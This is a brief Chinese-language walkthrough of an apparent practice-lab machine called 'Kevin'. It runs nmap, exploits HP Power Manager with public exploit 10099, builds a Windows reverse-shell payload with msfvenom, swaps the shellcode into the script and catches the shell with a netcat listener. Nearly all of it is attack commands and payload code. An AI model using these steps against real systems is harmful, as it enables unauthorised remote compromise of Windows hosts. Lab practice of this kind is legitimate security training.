Kevin
nmap扫描
nmap -p- --min-rate=1000 -T4 192.168.181.45 -Pn --open -v
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
3573/tcp open tag-ups-1
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
80 端口 是 HP Power Manager
searchsploit -m 10099
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.53 LPORT=80 EXITFUNC=thread -b "\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5" x86/ alpha-mixed --platform windows -f python
修改payload
原payload:
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
......)
evil = evil % (HOST,HOST,SHELL,HOST)
修改后
buf = b"n00bn00b"
buf += b"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
......
evil = evil % (HOST,HOST,buf,HOST)
之后执行 exp 开启监听 等1分钟左右 获取shell
nc -lnvp 445
python2 10099.py 192.168.181.45